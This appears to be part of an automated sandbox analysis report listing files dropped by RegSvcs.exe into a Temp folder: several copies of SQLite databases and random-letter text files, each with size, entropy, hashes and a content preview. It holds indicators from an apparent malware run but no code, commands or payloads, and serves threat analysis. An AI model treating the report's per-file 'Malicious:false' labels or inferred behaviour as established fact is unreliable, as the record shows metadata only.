                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, user version 7, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 5, database pages 4, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                Category:dropped
                                                Size (bytes):131072
                                                Entropy (8bit):0.07093764277882578
                                                Encrypted:false
                                                SSDEEP:12:DgIfgbz+Kh0sFcw23FmdAc/OPVJXfPNn43etRRIYRJxeYaNcDakMGz:DCf1ysFZ232ANVpP9TJKN0MG
                                                MD5:37F03D0EB1744FFEBCF26E3DB4A4280F
                                                SHA1:0B120B18B36AD6A64C27D3845A5871D10568C92E
                                                SHA-256:4D7F53C9B0D3757074542B9EB246FA5242456418394DAD90D23CB0CE8D664040
                                                SHA-512:49397393F2E9B43A696606EACCAB285165AD7919C1C0D1BC62B42B6C2DD564AA352E49D1172CCEAEF41F6D1D7856523F96D009CE9EA0968017FAE662167CA5A0
                                                Malicious:false
                                                Preview:SQLite format 3......@ .........................................................................-.......}..~!..}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmp1AD0.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, user version 7, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 5, database pages 4, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                Category:dropped
                                                Size (bytes):131072
                                                Entropy (8bit):0.07093764277882578
                                                Encrypted:false
                                                SSDEEP:12:DgIfgbz+Kh0sFcw23FmdAc/OPVJXfPNn43etRRIYRJxeYaNcDakMGz:DCf1ysFZ232ANVpP9TJKN0MG
                                                MD5:37F03D0EB1744FFEBCF26E3DB4A4280F
                                                SHA1:0B120B18B36AD6A64C27D3845A5871D10568C92E
                                                SHA-256:4D7F53C9B0D3757074542B9EB246FA5242456418394DAD90D23CB0CE8D664040
                                                SHA-512:49397393F2E9B43A696606EACCAB285165AD7919C1C0D1BC62B42B6C2DD564AA352E49D1172CCEAEF41F6D1D7856523F96D009CE9EA0968017FAE662167CA5A0
                                                Malicious:false
                                                Preview:SQLite format 3......@ .........................................................................-.......}..~!..}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmp309C.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmp30AD.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmp8863.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1026
                                                Entropy (8bit):4.702896917219035
                                                Encrypted:false
                                                SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                Malicious:false
                                                Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

                                                C:\Users\user\AppData\Local\Temp\tmp8864.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1026
                                                Entropy (8bit):4.688505748329201
                                                Encrypted:false
                                                SSDEEP:24:fOpwMLhSm1UbWgtD1i0Sn1EcsITViZiFeEaf:gLhSGqP1vSn11l8ceTf
                                                MD5:E791BC4BB488A2AE526214AB2CCF03F0
                                                SHA1:FEBDEFE4D61586EE877A369BB31B4B92B19D5E2D
                                                SHA-256:4EFC0B5E75E9B1A642F3BC4FACAE7C8F8C77DFAD5F6C0F3F2C807B3654576616
                                                SHA-512:61EF6F62E86F65DA2E7CC9821DA2AD669C4AD62275A044153BCE247AB2FCCC938B7EB57C46099AB4A84909CEC5104FF5B95D12161C3D7AA353B79647122C15BB
                                                Malicious:false
                                                Preview:CURQNKVOIXHCBQTSXQTLVFUQNXQHHCWYVOGQUFVROSMMUONAUKUVELZWAMQGAGYEFMWBMUVKBAZCJASDGVTNFSHXHAPKEOWREALSYDMQPTJCKDQQZDNAPQIKAIKYDUXQDSIUJTIPCNAAPMQGBGORBBNYWTYRCODCKULTLKEDUVEVKYPTDPYWDHCCBFECLXTAHWTXYPAZBSUTWHNQPXUDZWAFEXNNPHGXWELAOZZREMNKMEKGTYGDHHUPJBMUOYYXAJRRWPIQWIEPWHTLVXJLPGWKHKFXPDTYKJNXBLYYCPPFYQHGBFNFBWUMKZVGJIAVXIXSEBJLYUYIFUDPWOVTOOTBWQNFVWLEYTFZYMTVZTCXTNNOBULSEYPLNAUCUUXLNZYIOCYYDRCXSVNBKUELOGHSLSPEKWUKINGRPMAGAJOPDOAGHPUAWUEWUGLAMOKASQCGYIJJNOEPUMCDLGYXGDJZABOLHJPLTUZIRBYLLYXROOEMOQWYXXOAXTWHXGMBRZIHEQPGICIJAOUSIKAJLZMEYDYWOFIVZEOLJQJXJLMMENDALUSENORVPGKLPBGAOQTNXCQSBECDXXCUNXHQLIPKOPVIETEIHHAZEFGOVYXJDBAQKQLDPIRHULNGBRDMBBZUKYVYIMBYVBNOIAKOFSHELZEVHLIYEWGVJXILTMZMBNWYJQUHFWZYDKPGFHJSRFOPTSUPYFZPRAIHCOAERERYGBLWLZZXLVAABEELDQELBYYROYSDLAWBIXRDKWLSLZQHNQYXERTVTNXGSHYGJOFVZISVKALMEBXVVOOXWYXSEINIZOTUVHTHDUHOJYJHLRGMSQXTWPSJZLTSSIKIIZPANAJSXTZAQBOKZRWBIRVFAHJIOEWMRKYMRVDYTGEWXHCWSRYRIGQHBYXEUXHZUSULJVNSYTNQRKAFOOQPRHBAAWVXLENJLGFYHTWUFVYSQDBXKEFYRPMBGBHQLJSVGLYIZQREICHIHYUTGCEP

                                                C:\Users\user\AppData\Local\Temp\tmp8874.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1026
                                                Entropy (8bit):4.695860210921229
                                                Encrypted:false
                                                SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                                MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                                SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                                SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                                SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                                Malicious:false
                                                Preview:FENIVHOIKNBCYIYDETVMHAXXCUSKVBIKIZDOEBTCBYNFPROLSQLGSXMEBIFYTUGWARWVYMTQJJQHOGKAFRWEYLIITISQGUPNXIDRSAYRHVYBLCBPWDGDGMRFUPDGTHSUZALGWUNUNBPRSUWLDEERQZPJULFBMZZHTJYWKVZQVLEDDNLGBWDACOPLRJZKBPCUZDJREYTIGQRDICOOOTVHDKQUIYHXBSIPRQMYKFMFQBOFQNAEVGNCFJMUUNPEAZHDDUMGETMIDSYNOIDGLIWBLWJMUJDZSXZDTSQDRTDTAVJOIMKOGLNUSQUAAVWIKDQYSLHFCCBWRVFCOFFOFLNYESKIXGLREFBUHJNLTUZWTINZBYSZGLBVOBBMXEMHDAPUEBYUOSIBCQKNMEMTLMDFOFSCTXSWXGSMZYXOITZUXDRNGKAWBECBBUVWDKNSCDDEQNOOYGYYOAXMJOTRVNPFWPCZVSEJKHIGKFUWNCSZBXBGNPXFFHNXKDQDNFIONUVXOCROEEFIGZFWGAHIHFQJGZYTVKVZDPYDSXSERFLDJPCVGKHMQFOTHPVOKTYLWAPGHXOGTKAUNDASAZUZHWRURHYWEQLZGBTJRWZBMRYRMEKQZWHBZYXZEMYOBLGWOOWHYBSYOACREZYWYZKZDZWKRVNMAIUFSJMRFNLCHGSJRDBFEVZHVONCJAKDIVXPNZSDFWRJZBNYCVNHSEHCTSXOCQTOLQXZKOFIQXWXQZEAWRCJWAJSYKYOZORHAIEUYWKKUMHQYPYIOSCFFODFUWOINUDONNHLPCLQAFMHQEHKVMPTJGZMRGJZGKKWXKQOCGHCKXSSHZWEGSFCSZBPAQPMKBQLDGHBWUHQXSHUZQGJVNGEWRQKNQTDOVIMFGAUQLLNAVTSEJCTOSENTCVYPTJTCCNNBRJDHLKKWLYCZNBHTKJZYJQTOROFOXGEKHGJMAWOECWOBHFFIQIEISKZOCKOWMGRFEKTINHWHFFOTZPG

                                                C:\Users\user\AppData\Local\Temp\tmp8875.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1026
                                                Entropy (8bit):4.69782189124949
                                                Encrypted:false
                                                SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                Malicious:false
                                                Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                C:\Users\user\AppData\Local\Temp\tmp8876.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1026
                                                Entropy (8bit):4.702896917219035
                                                Encrypted:false
                                                SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                Malicious:false
                                                Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

                                                C:\Users\user\AppData\Local\Temp\tmp8887.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1026
                                                Entropy (8bit):4.688505748329201
                                                Encrypted:false
                                                SSDEEP:24:fOpwMLhSm1UbWgtD1i0Sn1EcsITViZiFeEaf:gLhSGqP1vSn11l8ceTf
                                                MD5:E791BC4BB488A2AE526214AB2CCF03F0
                                                SHA1:FEBDEFE4D61586EE877A369BB31B4B92B19D5E2D
                                                SHA-256:4EFC0B5E75E9B1A642F3BC4FACAE7C8F8C77DFAD5F6C0F3F2C807B3654576616
                                                SHA-512:61EF6F62E86F65DA2E7CC9821DA2AD669C4AD62275A044153BCE247AB2FCCC938B7EB57C46099AB4A84909CEC5104FF5B95D12161C3D7AA353B79647122C15BB
                                                Malicious:false
                                                Preview:CURQNKVOIXHCBQTSXQTLVFUQNXQHHCWYVOGQUFVROSMMUONAUKUVELZWAMQGAGYEFMWBMUVKBAZCJASDGVTNFSHXHAPKEOWREALSYDMQPTJCKDQQZDNAPQIKAIKYDUXQDSIUJTIPCNAAPMQGBGORBBNYWTYRCODCKULTLKEDUVEVKYPTDPYWDHCCBFECLXTAHWTXYPAZBSUTWHNQPXUDZWAFEXNNPHGXWELAOZZREMNKMEKGTYGDHHUPJBMUOYYXAJRRWPIQWIEPWHTLVXJLPGWKHKFXPDTYKJNXBLYYCPPFYQHGBFNFBWUMKZVGJIAVXIXSEBJLYUYIFUDPWOVTOOTBWQNFVWLEYTFZYMTVZTCXTNNOBULSEYPLNAUCUUXLNZYIOCYYDRCXSVNBKUELOGHSLSPEKWUKINGRPMAGAJOPDOAGHPUAWUEWUGLAMOKASQCGYIJJNOEPUMCDLGYXGDJZABOLHJPLTUZIRBYLLYXROOEMOQWYXXOAXTWHXGMBRZIHEQPGICIJAOUSIKAJLZMEYDYWOFIVZEOLJQJXJLMMENDALUSENORVPGKLPBGAOQTNXCQSBECDXXCUNXHQLIPKOPVIETEIHHAZEFGOVYXJDBAQKQLDPIRHULNGBRDMBBZUKYVYIMBYVBNOIAKOFSHELZEVHLIYEWGVJXILTMZMBNWYJQUHFWZYDKPGFHJSRFOPTSUPYFZPRAIHCOAERERYGBLWLZZXLVAABEELDQELBYYROYSDLAWBIXRDKWLSLZQHNQYXERTVTNXGSHYGJOFVZISVKALMEBXVVOOXWYXSEINIZOTUVHTHDUHOJYJHLRGMSQXTWPSJZLTSSIKIIZPANAJSXTZAQBOKZRWBIRVFAHJIOEWMRKYMRVDYTGEWXHCWSRYRIGQHBYXEUXHZUSULJVNSYTNQRKAFOOQPRHBAAWVXLENJLGFYHTWUFVYSQDBXKEFYRPMBGBHQLJSVGLYIZQREICHIHYUTGCEP

                                                C:\Users\user\AppData\Local\Temp\tmp8888.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1026
                                                Entropy (8bit):4.695860210921229
                                                Encrypted:false
                                                SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                                MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                                SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                                SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                                SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                                Malicious:false
                                                Preview:FENIVHOIKNBCYIYDETVMHAXXCUSKVBIKIZDOEBTCBYNFPROLSQLGSXMEBIFYTUGWARWVYMTQJJQHOGKAFRWEYLIITISQGUPNXIDRSAYRHVYBLCBPWDGDGMRFUPDGTHSUZALGWUNUNBPRSUWLDEERQZPJULFBMZZHTJYWKVZQVLEDDNLGBWDACOPLRJZKBPCUZDJREYTIGQRDICOOOTVHDKQUIYHXBSIPRQMYKFMFQBOFQNAEVGNCFJMUUNPEAZHDDUMGETMIDSYNOIDGLIWBLWJMUJDZSXZDTSQDRTDTAVJOIMKOGLNUSQUAAVWIKDQYSLHFCCBWRVFCOFFOFLNYESKIXGLREFBUHJNLTUZWTINZBYSZGLBVOBBMXEMHDAPUEBYUOSIBCQKNMEMTLMDFOFSCTXSWXGSMZYXOITZUXDRNGKAWBECBBUVWDKNSCDDEQNOOYGYYOAXMJOTRVNPFWPCZVSEJKHIGKFUWNCSZBXBGNPXFFHNXKDQDNFIONUVXOCROEEFIGZFWGAHIHFQJGZYTVKVZDPYDSXSERFLDJPCVGKHMQFOTHPVOKTYLWAPGHXOGTKAUNDASAZUZHWRURHYWEQLZGBTJRWZBMRYRMEKQZWHBZYXZEMYOBLGWOOWHYBSYOACREZYWYZKZDZWKRVNMAIUFSJMRFNLCHGSJRDBFEVZHVONCJAKDIVXPNZSDFWRJZBNYCVNHSEHCTSXOCQTOLQXZKOFIQXWXQZEAWRCJWAJSYKYOZORHAIEUYWKKUMHQYPYIOSCFFODFUWOINUDONNHLPCLQAFMHQEHKVMPTJGZMRGJZGKKWXKQOCGHCKXSSHZWEGSFCSZBPAQPMKBQLDGHBWUHQXSHUZQGJVNGEWRQKNQTDOVIMFGAUQLLNAVTSEJCTOSENTCVYPTJTCCNNBRJDHLKKWLYCZNBHTKJZYJQTOROFOXGEKHGJMAWOECWOBHFFIQIEISKZOCKOWMGRFEKTINHWHFFOTZPG

                                                C:\Users\user\AppData\Local\Temp\tmp8889.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1026
                                                Entropy (8bit):4.69782189124949
                                                Encrypted:false
                                                SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                Malicious:false
                                                Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                C:\Users\user\AppData\Local\Temp\tmpACEC.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.7798653713156546
                                                Encrypted:false
                                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmpACFD.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.7798653713156546
                                                Encrypted:false
                                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
